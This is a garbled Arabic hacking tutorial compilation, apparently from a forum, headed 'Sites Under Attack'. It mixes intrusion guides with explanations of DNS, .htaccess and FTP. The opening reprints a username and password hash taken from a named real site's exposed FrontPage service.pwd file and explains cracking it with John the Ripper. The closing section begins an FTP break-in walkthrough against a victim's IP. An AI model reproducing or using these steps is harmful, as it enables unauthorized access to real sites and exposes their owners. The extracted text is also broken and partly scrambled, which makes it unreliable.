طیبلوقدرنا ننزل واحد منالملفات هذه (ملاحظةالثغرة هذه موجودة ب<br />
عالن ت)لو نزلناها نفتحهابالمفكرة ونلاقي السطر هذا على سبیلالمثال<br />
goodyco:CalXS8USl4TGM<br />
٧٠% من المواقعالموجودة<br />
وهذا من موقعقودي http://www.goody.<strong>com</strong>.sa/_vti_pvt/service.pwd<br />
طیبال حین goodycoالیوزر والباسس مشفر واللي هو CalXS8USl4TGM<br />
وشلون ینفك؟ ینفك ببرنامجاسمه<br />
john the repaier<br />
تنزلهوتح ط المل ف المشفر (معالیوزر)بمجلد واحدوتفتحالدوسوتروحلمجلد جوهنوتكتبالسطر<br />
التالي john -i PASSWORD.FILE<br />
وعاداستناه یطلعلكالباسس<br />
طیب نرو حللفقرةالثالثة واللي هيالنظام<br />
زي ماشفنا النظام هولینكس<br />
لكنلینكسای ش؟فیه رید هات و ماندریك وفیه منهإ صدارتكثیروثغرات اكثر<br />
لكن هنا راحتواجهك مشكلتین<br />
اول شيءمعرفةالنظامتقدرتطلعه منابداوتشغیل ول telnet واكتب عنوانالموقع یطلعلكالنظامفوق<br />
نوعه وإ صدارته<br />
المشكلةالثانیة لازم یكون عندكلینكساصلا<br />
علشانثغراتهبلغةال c وهذه ماتشتغلإلا عاللینكسفقط<br />
================<br />
<strong>١</strong>٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/http://neworder.box.sk هذاالموقع مفید جداتكتب مثلا (فوقبالمربعاللي عالیمین) IISاو<br />
apacheاو منتد ى واصدارتهاوايبرنامج ویطلعلكثغراته<br />
http://www.ussrback.<strong>com</strong>/الموقع هذا خطیر جداً جداًتروح ل EXPLOITSاللي عالیسار<br />
وتختاراولاختیار هناثغرات جمیعالانظمة منلینكس و ویندوز و و والخ.. ومنوعة من<br />
یونيكود...<br />
c و perl و<br />
<strong>١</strong>٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" معلومات عن ال " DNS<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$$$<br />
الكاتب: ACID BURN_EG<br />
$$$$$$$$$$$$$$$$$$$<br />
ماهو ال ؟؟؟ DNS<br />
==============<br />
DNS :هواختصارلكلمه Domain Name System ویتصل سرفرال DNS عادة علىبورت<br />
٥٣ ممایعنىانكاذااردتالاتصاللأحدالمواقع واستعملتال DNSلهذاالموقعفسوف تتصلبه عن<br />
طریقالبورت ٥٣ و سوفیترجماویحولال translates alphabetical hostnames ویعنى<br />
اسم الموقع مثل : http://<strong>www.3asfh</strong>.<strong>com</strong>/ الى IP ADRESSES مثل ,<strong>١</strong><strong>١</strong><strong>١</strong>٫ <strong>١</strong><strong>١</strong><strong>١</strong>٫ <strong>١</strong><strong>١</strong><strong>١</strong><br />
<strong>١</strong><strong>١</strong><strong>١</strong> و العكس ص حیح و عندما تتمالعملیه تتصلبالموقع مباشره و عملیه التحویل هذهتسمى<br />
addressاىتحویلاوت resolution حلیل عنوان الموقع الى IP اوالعكسلنستطیعالاتصالبه<br />
قبل ظهورال DNSكاناسماخر لعملیهال. address resolution ولكنقد ظهرال DNS لجعل<br />
تذكر عناوین المواقع وحفظها اكثر سهولة ومرونة من ذيقبل حی ثقبل ظهور هذهالخدمةفانكللدخول<br />
لموقعمعین یجب علیك كتابةال ipلهذاالموقعللدخولالیه address وكانالاسم المستعملله<br />
قبلال DNSكانیتكون من مل فاسمهال HOST FILE وكان عباره<br />
عناسماء الهوستسا ىالمواقع و عنواوینال IP الخاصهبهم وكان هذاالمل ف تتولى رعایته<br />
، و<br />
address resolution<br />
(SRI-NIC). Stanfordو Research Institute's Network Information Center<br />
.<br />
كان على هذاالراعى ان یجد ث (UPDATE) الجدول هذا حوالىكلاسبوع و یمدهبالعناوین الجدیده و<br />
الارقام التى ظهرت و علىالسیستمادمینان یجدد هوالاخر ملفهاو عن طریق اتصالال FTPبینه و<br />
بینلراعىاى.SRI-NIC وبعد فترة من الزمن رأوفيان هذهالطریقة غیره مجدیة وغیرفعالة ومع<br />
تطور خدمةالانترنتكل ذلكأد ى الى ظهور ال DNSلیفعل ذلك.<br />
وال DNSلیسله مركزاى decentralized اىانهلیس هناكمكانمعیناو نظاممعینیتحكمفىكل<br />
ال DNSبلبال عكسفال DNS عباره عنقاعدةبیبانات موزعهبشكل منظم وتوجد علىأمثرمن سیرفر<br />
وكل سیرفر علیه DNS یعر فاین یبحث عندما یریدانی حصل علىمعلومهمعینهاوهوستمعیناو<br />
یریدتسجیللدومین جدید<br />
هذهكانت مقدمة مبسطة عن هذهالخدمة واهمیتها<br />
...<br />
SERVER: THE DNS خادم الدياناس :<br />
================================<br />
ال DNSهو SERVER عباره عنكمبیوترویعمل عادتا على نظام UNIX أولینكس و یستخدم<br />
برنامجالیونكس BIND اى Domain). (Berkeley Internet Name و هنالكبرامج عدیدة مثل<br />
هذهللویندوز و الماكنتو ش,وغیرهااذااراداحداستعمالهم ك DNS SERVER ولكنالكل یفضلال<br />
. UNIX ویتكونبرنامجال : DNS منجزئین<br />
the name server itself (the daemon program that listens<br />
RESOLVER یسمى toوالاخر port 53)<br />
و ال NAME SERVER هذا یستجیبالى متصف حك عندماتطلبمعلو مهمعینهفمثلا عندماتفتح<br />
الانترنت اكسبلورر وتكتباوتطلب منه موقهمعین مثل /http://<strong>www.3asfh</strong>.<strong>com</strong>فسیسأل<br />
موجودله (و هذا یعتمد على اتصالكبالشبكه و رقمالا ىبىالخا صبك) عن عنوان<br />
ال IPلهذ ا الموقعالمطلوب<br />
لان المتصفح یحتاج هذاال IPلیجد السرفر الذ ىلدیه هذاالهوستا ى هذا الموقع و یطلبمحتویات<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/<br />
المتصفحاقرب DNS<br />
<strong>١</strong>٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الموقع منالسرفرلیعرضهالكفى متصف حك.<br />
وقبل هذا سیسألال daemonفى program جداولهاىفى ذاكره متصف حك عن الموقعالذىتطلبه<br />
فأذالم یجده ینتقلالى ما سبق شرحه و هكذا تتمالعملیه.<br />
THE TREE INFORMATION:<br />
=========================<br />
الان بعدان اتقفنا علىانك عندماتطلب رقم IP معین منالمتصفح حقك و لا یجدهفىال DNS الم حلي<br />
ا ى الخا صبك سو فیسألال DNS SERVER الاعلى منهفى المستوى عنهلیجده واذالم یجدهفى<br />
مستوىاعلىفینتقلللبح ثفى مستوىاعلى واعلى و هكذا یسیرالب حث منالاقل الىالاعلىفى<br />
مستویاتال.SERVERS DNS<br />
:<br />
و طبعانتیجه من هذاالاتصالفسنستنتج وجود شجره اتصال و معلومات ولكنكی فتعملبالضب ط دعونا<br />
نأخذ مثال<br />
لوفرضناانال ISP الخا صبككان مثلا isp.co.uk و هذایعتمد على اتصالكبالانترن تاى حسب<br />
الشركه و السرفر الذىتشبك علیهفمنالطبیعى طبعاان یكون ال ISP's DNS server's<br />
IP حثلك عن والانفالنفر ضانك سألت هذاال DNSلیب dns.isp.co.uk مثل هذا hostname<br />
الخا ص ب http://<strong>www.3asfh</strong>.<strong>com</strong>/ مثلافسیقوم هذاال dns.isp.co.uk بالبحثفى جداوله<br />
الم حلیه المخذنهفىالذاكره عندهفیجدها و اذالم یجدهافسینتقلكماقلناالى مستوىاعلى منال DNS<br />
لیب حثفیه واذالمیجدهایضافىالمستو ىالاعلىفعلیهان یقوم بتغییر مكانالب حثكلیا<br />
فمثلا من dns.isp.co.uk الى some-organization.org.uk او<br />
,university.ac.ukوالخ england.gov.uk, airforce.mil.uk وهناكامثلهكثیرا طبعا و<br />
كل شئ ینتهى ب UK واذالم یجدهایضافىكلالاماكن المتاحله الب حثفیهافسیرجعالمتصفحالى<br />
موجود علىالشبكه واسمهال ROOTفهو یحتوى علىكل عناوینال IP علىكلللمواقع<br />
الموجوده علىاى DOMAIN NAME وهذكا حسب هذهالعملیةالتسلسلیةیتنقل ال DNSبحثا عن<br />
school.edu.uk,<br />
SERVER<br />
اكبر DNS<br />
الدومین .<br />
متى یفشل ال DNSفيال حصول علىالموقعاوتحدید موقع هذاالدومین ؟<br />
======================================<br />
أتمنىانتكونالاجابةقد وصلتلأفهامكمقبلانأذكرها وهياماافي حالة عدم وجود هذاالدومین<br />
بالاصل وسیطولالبحث لانها سیبحثفيكلالمراحل حتى یصلللجذز ویبحثفيكلالايبیات<br />
أوالدومیناتالمخزنةفیه ومنثم ستكونالاجابة<br />
البحث ما یقارب ٢٠ثانیة <strong>١</strong>٥<br />
الحالة الأخرى<br />
نتیجه طولالب حثفیقوم متصف حك بقدانالاتصال معال DNS اى عملیه. TIMED OUT<br />
وفى هذه الحاله نضغطفىالمتصفح على REFRESH او RELOAD طبعا حسب متصف حك<br />
ROOT<br />
address could not be found وقد یستمر<br />
...<br />
–<br />
:<br />
<strong>١</strong>٧
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
شرح ملف<br />
" htaccess<br />
..... htaccess<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$<br />
BSD-r00t<br />
$$$$$$$$$$$$$$<br />
الكاتب:<br />
|<br />
مقدم ة<br />
*اهمیة مل ف<br />
*كیفیة عمل مل ف<br />
* عمل صفحات<br />
منع عر ض محتویاتالمجلد الذي لا یوجدبه<br />
منع/ اتاحة دخول الموقع لاشخا صمعینة<br />
*تحویل من یحاول فتحلینكللینكاخر<br />
|<br />
* |<br />
|<br />
htaccess. |<br />
|<br />
htaccess.<br />
|<br />
|<br />
error خاصة<br />
|<br />
index<br />
* |<br />
|<br />
* |<br />
|<br />
|<br />
|<br />
| * عملالمل ف .htpasswd<br />
|<br />
| * الحمایةبواسطه htaccess.<br />
|<br />
htaccess.<br />
* |<br />
|<br />
|<br />
|<br />
|<br />
--------------------------------------------------<br />
منعاظهار المل ف<br />
*اضافة مستخدمینفيالمل ف<br />
* جعلالصفحا تتظهربامتداداخر<br />
مقدم ة<br />
.<br />
*<br />
------------<br />
مناهم وسائل حمایةالمواقع واغلاق بع ضالاجزاءفیه بكلمة سر ، و منع بع ضالناس من دخل الموقع<br />
و السماحلغیرهمبالدخول .. هواستخدامالمل ف htaccess. والذي یمكن عملالكثیر والكثیربه .<br />
و هذا المل ف مخفي و محمي بكلمة سر<br />
*اهمیة مل ف<br />
index<br />
htaccess.<br />
-----------------------<br />
error خاصةبك<br />
-٤<br />
<strong>١</strong>- حمایةايجزءفیه بكملة سر<br />
٢- عمل صفحات<br />
٣- منع عر ض محتویاتالمجلدالذي لا یوجدبه<br />
منع/ اتاحة دخولالموقع لاشخا صمعینة<br />
٥-جعل صفحة البدایة بأمتدادات غیر .asp. .. html ,<br />
٦-تحویل من یحاول فتحلینكللینكاخر<br />
*كیفیة عمل مل ف<br />
htaccess.<br />
---------------------------<br />
یمكنك عمل هذا المل فبواسطهاي محرر نصو ص مثلالنوتباد "Notepad" عن طریق عملللمل ف<br />
حفظباسم و نحفظالمل فبهذاالاسم htacces. علىان یكونلی سامتداده .txtايانلیس هناكاسم<br />
- علامتيالتنصی صفياسمالمل ف<br />
للمل ف ،اذالمتستطیع ذلكاحفظ المل فباسم<br />
. -<br />
"htaccess."<br />
<strong>١</strong>٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
* عمل صفحات<br />
.<br />
- :<br />
error خاصة<br />
------------------------<br />
.<br />
و الفائدة منهاهوانالموقع یظهربشكل افضلكماانه عند محاولةاي شخ ص عمل سكان علىالموقع<br />
سو ف یظهرانكان الموقعبهكل الثغرات و ذلك لان طریقة عمل السكانر هيانه یقوم بتطبیقكلثغره<br />
على الموقع و یرصدالنتیجه<br />
فاذاكانهناكايتغیر یظهرلككأنالموقع علیه هذهالثغره<br />
و یمكنك عم ل صفحاتال error الخاصه ك عن طریق<br />
أ-تصمیم صفحاتال errorاولا<br />
ب-تحمیلالصفحات علىالموقع<br />
ج-اضافه السطر الكتابيفيالمل ف htaccess.<br />
ErrorDocument error_num<br />
directory_file<br />
ب حی ث یكون error_numهو رقمالخطا "الارقام موجودبالسفل<br />
صفحهال errorالتيقمت بتصمیمها<br />
مثال<br />
" و<br />
ErrorDocument 404<br />
.<br />
:<br />
/errors/nfound.html<br />
errors وارقامها : -<br />
-----------------------<br />
| Bad Syntax | ٤٠٠ |<br />
-----------------------<br />
| Unauthorized | ٤٠<strong>١</strong> |<br />
-----------------------<br />
| Not Used | ٤٠٢|<br />
-----------------------<br />
| Forbidden | ٤٠٣ |<br />
-----------------------<br />
| Not Found | ٤٠٤ |<br />
-----------------------<br />
ال<br />
منع عر ض محتویات المجلد الذي لا یوجدبه<br />
index<br />
*<br />
-----------------------------------------------------<br />
directory_fileهو مكان<br />
بع ضالمواقع عند محاولة فتحاي دلیل علیها و لا یكونبه مل ف index یقوم الموقعبسرد جمیع<br />
محتویات هذاالدلیلولحل هذه المشكلهتوجد طریقتین<br />
أ- وضع مل ف indexفيكلالمجلدات " وبالطبع هذ اصعب جدا<br />
ب-باستخدامالمل ف htaccess. عن طریقاضافه السطرالتاليفي المل ف<br />
منع/ اتاحة دخول الموقع لاشخا صمعینة<br />
"<br />
-:<br />
Options -Indexes<br />
-:<br />
*<br />
----------------------------------------<br />
<strong>١</strong>٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
..<br />
یمكنكباستخدامالملف htaccess. منع شخ صمعین من دخولالموقع بعدمعرفةالايبيالخاصهبه و<br />
یمكنكالاس تفاده من ذلك حیث یمكنك منع دخلالموقعلمن لاتریدكما یمكنك منع دخولالموقع لاي شخ ص<br />
فياسرائیل مثلا<br />
و یمكنك ذلك عن طریقاضافةالسطرالتاليفيالمل ف<br />
؟؟؟.؟؟؟.؟؟؟.؟؟؟ deny from<br />
- :<br />
حیثان ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هوالايبيالخا صبه .<br />
واذااردت منعاياحد من دخول الموقع یمكنكاضافة السطر التالي<br />
- :<br />
deny from all<br />
- :<br />
؟؟؟.؟؟؟.؟؟؟.؟؟؟ allow from<br />
واذااردت السما حلشخ صمعینبدخول الموقع یمكنك ذلكباضافةالسطر التالي<br />
حیثانا ؟؟؟.؟؟؟.؟؟؟.؟؟؟هوالايبيالخا صبه<br />
*تحویل من یحاول فتحلینكللینكاخر<br />
-------------------------------------<br />
وتسمى هذهالعملیه ب Redirection وهي مناهمفوائد .htaccessالمل فتستخدم مثلا عندتغیر<br />
موقع مل فقدیم علىالموقعالى مكان جدیدفیمكنكباستخدامالمل ف htaccess. عند محاولةاحد فتح<br />
احدالینكالقدیمتوجیههالىالینكالجدید عن طریقاضافةالسطر التاليفيالمل ف<br />
- :<br />
؟؟؟.؟؟؟/ /somewhere/???.??? Redirect<br />
http://www.site.<strong>com</strong>/newlocation<br />
ب حی ث یكون /somewhere/؟؟؟.؟؟؟هو مكانالمل فالقدیم و<br />
http://www.site.<strong>com</strong>/newlocation ؟./ ؟؟ ؟؟؟هو مكانالمل ف الجدید.<br />
----------<br />
* عملالمل ف .htpasswd<br />
------------------------<br />
ویمكنكأنتقوم بعملهبنفس طریقة المل ف htaccess. ، و سو فنعمله حتى نسطیعاستخدامالمل ف<br />
htaccess في الحمایة و سو ف نكتبفيالمل ف htpasswd ما یأتي<br />
.<br />
-:<br />
user1:EncryptedPwd1<br />
user2:EncryptedPwd2<br />
o حیثان user1 , user2 هواسم المستخدم .<br />
o و<br />
EncryptedPwd1 , EncryptedPwd2 هيكلمات السر ولكن مشفره و یمكنكتشفیراي<br />
كلمةتریدها عن طریق الموقع<br />
http://www.euronet.nl/~arnow/htpasswd<br />
او http://www.e2.u-net.<strong>com</strong>/htaccess/make.htm<br />
فمثلالواردنا وضع یوسرباسم Security وكلمةالسر الخاصةبه هي fu93hds3 نذهباولا الى<br />
الموقع<br />
http://www.euronet.nl/~arnow/htpasswd<br />
username : Security و o<br />
passwrod & re-enter password : و fu93hds3 o<br />
Security:893bNicBcwszw
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
*الحمایةبواسطه htaccess.<br />
----------------------------<br />
.<br />
وتعتبرالفائدةالرئیسیةللمل ف حیثانه یمكن منعاياحد من دخول دلیلمعینفيالموقعالااذاكانمعه<br />
كلمة السر والیوسر نیم ،فیمكنك عن طریقها عمل منتدى خا صاواي شئترید.<br />
فعند وضعالمل ف .htaccessفياي دلیل و حاولاحد دخول هذاالدلیلاوايجزء یندرجتحته سو ف<br />
یطلب منه كلمة سر و یوسر<br />
و یمكنك عمل ذلك عن طریقاضافة ما یأتيفيالمل فقبل نسخهفيالدلیلالمراد حمایته<br />
--:<br />
AuthUserFile<br />
AuthName "Enter your user and passed "<br />
user-Require valid<br />
AuthType Basic<br />
/somewhere/.htpasswd<br />
please<br />
<br />
require valid-user<br />
<br />
oب حی ث یكون somewhere/.htpasswd/هو مكان مل ف htpasswd. على موقعك<br />
o و یكون Enter your user and passed please هي الرساله التي سو فتظهر لتطلبكلمة<br />
السر<br />
منعاظهار المل ف<br />
htaccess.<br />
*<br />
-----------------------------<br />
قد عرفناالانانلهذا المل فاهمیهكبیرهفیجب علیناان نحمیه جیدا ،فالبرغم منانالمل ف مخفيالا<br />
انه غیر سالم منان یكون السرفر نفسه غیر مؤمناوانههناكتصریح خطأ<br />
لذلك سو ف نمنع عر ض هذاالمل ف عن طریقاضافة ما یأتي<br />
..<br />
<br />
order allow,deny<br />
- :<br />
deny from all<br />
<br />
فاذا حاولاحد عر ضالمل ف سو ف یظهرله . error 403<br />
* جعلالصفحا تتظهربامتداداخر<br />
-------------------------------<br />
ویمكنباستخدام هذهالخاصیة عمل مل ف یظهركأنامتداده<br />
باضا ف السطر التالي<br />
html. ولكنه ذوامتداد txt. مثلا .<br />
AddType text/plain html<br />
- :<br />
-:<br />
ویمكنك رؤیةكافةالتغیراتالتي یمكنك عملهافي هذاالمل ف<br />
http://www.pharaonics.net/books/MIME.txt<br />
...<br />
٢<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
" FTP<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
نظام نقل الملفات<br />
..........<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$<br />
الكاتب:الجوكر<br />
$$$$$$$$$<br />
ما هو نقلالملفا ت FTP؟<br />
FTPهياختصارلكلمة File Transfer Protocol وتعنيبروتوكول نقل الملفات، وهذهالخدمة هي<br />
احدىتسهیلات TCP/IP التيتجعل منالممكن نقلالملفا تبین الكمبیوترات علىالشبكة ومن میزات<br />
FTPالرائعةأنهاتقوم بترجمة شكل الملفاتالنصیةبطریقةأتوماتیكیة حیثأنالكمبیوتراتتحتوي نظم<br />
تشغیل مختلفة وعلیهفلدیهاأشكال Formats مختلفةللملفاتالنصیةفبالتاليتحتاج لترجمة وهو ماتقوم<br />
به FTP, وبخدمة نقل الملفاتفاننانحتاجلبضع نقرات على الفأرةكي ننقل ملفاًفيأمیركا الى جهازنا .<br />
أقسام نقلالملفات :<br />
:<br />
.<br />
نقل الملفات ینقسمالىقسمین :<br />
تنزیل الملفا ت:Download<br />
وهو جلبالملفات منالكمبیوترالمضی ف Host الىالجهازالم حلي.Local<br />
ارسالالملفا ت:Uplaod<br />
وهوارسال الملفات منالكمبیوتر الم حلي Local الىالكمبیوترالمضی ف.Host<br />
ومنالناحیة الأمنیةفهناك نوعانلنقل الملفات :<br />
نقل مؤمن:FTP Secure<br />
تحتاج الىاسم مستخدم وكلمة مرورللدخولالى النظاموت حصل علیه من مدیرالنظامالمضیف.<br />
نقل مجهول:FTP Anonymous<br />
لاتحتاجالىاسم مستخدم وكلمة مرورللدخولوتستطیع غالباًاستخدام guestأو anonymous<br />
عوضاً عنهما.<br />
تصن ف مصادر البرامج علىالانترنت الىثلاثةأقسام<br />
ملكیة عامة:Domain Public<br />
وضعتالبرامج هناللاستخدام العامفلیس هناك حقوق ملكیةلأحد ولاقیود علىاستخدامهاوتوزیعها<br />
وتعدیلها<br />
مصادر مجانیة:Freeware<br />
یح قللجمیعاستخدام هذه البرامجأوتوزیعها ولكن هناك حقوق ملكیة ونشر ولا یجوزتعدیلهاأوبیعها.<br />
مصادر مشتركة:Shareware<br />
یتمتوزیع هذهالبرامجبغر ض التجربةقبلالشراء وقدلاتتضمن جمیعالممیزات ویجبت حطیم النسخ بعد<br />
انتهاء مدتها.<br />
FTPو الفیروسات<br />
:<br />
یجبأنتعلمفيالبدایةأن الملفات والبرامجتنقسمالىقسمین<br />
ASCII:<br />
٢٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اختصاراًل Interchange) American)والملفا Standard Code for Information ت من<br />
هذا النوعتحتوي على سبعة جزیئا ت bits تتراو حقیمتهابینالصفر و <strong>١</strong>٢٧. ویستخدم هذاالمصطلح<br />
للتعبیر عن المعیارالذي یقوم بتحویلالأحر فالىأرقامفيالكمبیوتر. وتستخدمالملفاتالنصیة هذاالنو ع<br />
منالصیغ.<br />
Binary:<br />
وتعنيالملفات ذاتالنظامالثنائي وتحتوي علىثمانیةجزیئات bits تتراو حبینالصفر و ٢٥٥ وتندرج<br />
الصور والبرامج والملفات المضغوطةتحت هذاالنو ع.<br />
والفیروسات لا یمكنأنتنتقل عبر ملفات ASCIIكما لایمكنأنتنتقل عبرالصوركصیغ & gif jpg &<br />
avi - ram - mpg - mp3 - منامتداداتالصور ولا عبر ملفاتالفیدیو والصوت مثل bmpوغیرها<br />
wavوغیرها ، وبمعنى آخرفانهاتنتقل عبر البرامج وملفاتالنظام والتشغیل والبرامج المضغوطة وعادة<br />
ماتكون - xxe : exe - <strong>com</strong> - bat - dll - drv - sys - bin - ovl - zip - mim - uue -<br />
bhx، b64كما - یمكنأنتنتقلفیروساتالماكرو عبرتطبیقا ت Office، MSلذلكاحذر من هذه<br />
الملفات واف حصها دائماًقبلتشغیلها.<br />
طریقة نقل الملفا ت : FTP<br />
هناك طرق عدیدةلنقلالملفات وهي :<br />
نقل الملفاتباستخدام نظامUNIX<br />
تتطلب هذهالعملیة عادةاستخدامأوامر وهاهنا بع ضأوامر:UNIX<br />
لنقل ملفات ASCII النصیة، وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجب<br />
اعادةالأمر.<br />
لنقل الملفاتالثنائیة، وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجباعادة<br />
الأمر.<br />
لفح ص المل ف ومعرفة هل هو من نو ع ASCIIأو.Binary<br />
لعر ضقائمة بأوامر.UNIX<br />
:dirعر ض محتویاتالدلیل<br />
:lsعر ض محتویاتالدلیلالحالي.<br />
تغییر الدلیل.<br />
filename: getجلب المل ف المطلوب وانزاله على جهازك.<br />
filename: mgetجلب مجموعة منالملفا ت.<br />
pwd: طباعةالدلیل الحالي.<br />
:byeانهاءالارتباط والخروج من النظامالبعید.<br />
ascii:<br />
binary:<br />
status:<br />
help:<br />
cd directory:<br />
نقل الملفاتباستخدام حساب:Shell<br />
أول ماتفعلهفي هذاالنو ع من نقلالملفات هوادخالالملقنالخا صبشركةتوفیرالخدمةفمثلاً سو فتدخل<br />
حسابكفي Tripod عن طریق Shell، Unix نكتبأولاً الأمر ftp متبوعاًبالوجهةالمرادةفیصبح :<br />
ثم ندخلالاسم وهو عل سبیل المثال ،"IronPrivate"ثم نقومبادخالالرقم<br />
السري وهو مثلاً "******". وبعدالدخول الىال حساب یمكنكاستخدام نفسأوامر Unix المعتادة.<br />
وإ ذاأردت المزید منالمعلومات عن نظامالUnix<br />
ftp ftp.tripod.<strong>com</strong><br />
٢٣
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
علیك الدخوول الى هذاالموقع:<br />
http://www.pc-worlds.net/lunexx.html<br />
فهو یفیدالمبتدئینفى هذا النظام .<br />
نقل الملفاتباستخدامالمتصفح:Browser<br />
نقل الملفا ت عن طریقالمتصفحات سهل جداًفما علیك سو ىادخال عنوان الموقع URL ویبدأ العنوان<br />
بكلمة ftp://ثمالعنوانبدلاً منكلمة http://للعناوینالعادیة، بعد الدخول الى موقعال FTP ستأتي<br />
الصفحة عبارة عن ملفات ومجلدات وماعلیك سو ى النقر على المل ف المطلوب لانزاله.<br />
نقل الملفاتباستخدام حساب:SLIP/PPP<br />
أفضلاستخدامات هذا النو ع من الربطأنهاتسمحلناباستخدامبرامجتابعة Programs. Client<br />
وأفضلبرنامجتابع یمكناستخدامهللنوافذ Windowsهوبرنامج.Ws_ftp<br />
استخدامبرنامج<br />
ادخل على البرنامج وذلكبالنقرالمزدوج علىأیقونةالبرنامج، سیظهرلك مربع حوار Session<br />
Profileوالذي من خلالهتقوم بتسجیل الدخول،اكتبفي خانة Profileاسم Name حسابالدخول؛<br />
اسم الملقن وفي<br />
هذا المثال هو ftp.tripod.<strong>com</strong>ثمفي خانة Hostاختر Type Autoلكي Detect یقومبالتدقیق<br />
التلقائيفي نو ع نظامالجهازالمضی ف، بعد ذلكقم بكتابةالاسمفي خانة User ID وهو مثلاً<br />
ثم الرقم السريفي خانة Passwordوسیظهر مخفیاً علىهیئة نجوم ******،ثم<br />
اضغط .OKكمافي الشكل التالي :<br />
خانة Host Name<br />
Ws_ftp LE 5.06:<br />
على سبیلالمثال My Home Page In Tripod واكتبفي<br />
IronPrivate<br />
بعد ذلك سیقوم البرنامجبالدخول الىال حسابالمطلوب وستنقسم نافذة البرنامجالىقسمین؛ القسمالأیسر<br />
هو جهازالكمبیوترلدیك والقسم الأیمنهو جهازالكمبیوترالمضی ف،في هذهالمرحلةتستطیع جلبأو<br />
ارسالالملفاتأوتغییراسمائهاأو حذفها ...الخ.أيتستطیعالتحكمفي محتویات حسابك علىالانترنتأو<br />
على جهازكبسهولةفائقة.<br />
نقل الملفاتباستخدامالاتصالالشبكيالبعید Telnet:<br />
Telnetهيبروتوكولانترنتمعیاريلخدماتالربط عن بعد ویسمحللمستخدمبربط جهازه على<br />
٢٤
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
كمبیوتر مضی ف جاعلاً جهازه وكأنهجزء من ذلكالكمبیوتر البعید. ویختل فالعر ض حسب نظامالكمبیوتر<br />
المضی ف.اذاكان الجهازالبعید یستخدم نظام Windowsفلا مشكلةأمااذاكان یستخدم نظام آخرفیجب<br />
معرفة بع ضالأوامرللتحكم وأهمأمر یجبأنتعرفههو "؟" والذي یحضرلكقائمةبالأوامراللازمة.<br />
-استخدامبرنامج Telnet من Windows:<br />
ترفق Windowsبرنامجاً سهلاً یسمى Telnetیمكنك الدخول علیهبالضغط علىقائمةابدأ Startثم<br />
تشغیل Runثماكتب Telnetوستنفتحلك صفحة البدءللبرنامج.. من Connectاختر Remote<br />
في صندوق الحوار Connect الذي سیظهرلكاكتبفي خانة Host Name اسم ملقن<br />
الجهازالمضیفثماكتبفي خانة Port المیناءأوالمنفذ (اذاكانلدیك)او اتركهكما هو،ثماختر منال<br />
، Type Termانكانلدیك والاقمبالتجربة. بعد ذلكاضغط Connect وعندمایتمالربطفستحتاج<br />
لادخالالاسم والرقمالسري. وبعدالانتهاء منالنقلاختر Disconnectمنقائمة Connect وبعد ذلك<br />
اختر … Exit<br />
System.<br />
٢٥
hi_HaCkEr & MaXhAk2000<br />
"<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" الإختراق عن طریقFTP<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$<br />
hacker dz<br />
$$$$$$$$$$$$$$<br />
الكاتب:<br />
FTP<br />
٢<strong>١</strong><br />
الیوم سوفنتناول طریقة إقتحام عبرالا فتيبي أولا ولنجاح ا لإقتحام یجبان یكونلدى<br />
الض حیة البور ت مفتوح و هوالبور تالخا ص بال و لتأكد منأنالبورت مفتوح علیكان<br />
تستعملبرامج السكان وهيكثیرة و مناهمها Superscanne بعدما تتأكدانالبور ت مفتوح ننتقل<br />
الى الخطوةالثانیة و هي :<br />
إ ضغط على<br />
Start<br />
ثم<br />
Run<br />
ثماكتب<br />
ftp – n<br />
سو فتطلعلك نافدةفيالدوس مكتوب علیها<br />
<br />
To<br />
أكتببجانب<br />
To<br />
رقمالإبيللض حیةثمإ ضغط علىإدخال والآن خدبالكمعي<br />
إدات حصلت على هداالردفقدتخطیت خطوة<br />
FTP<br />
Connected to www.assassin.<strong>com</strong><br />
.(websrv1 Microsoft FTP Service (Version 4.0 ٢٢٠<br />
و الآ نأكتب الكتابةالتالیة ftp>quote user ftp<br />
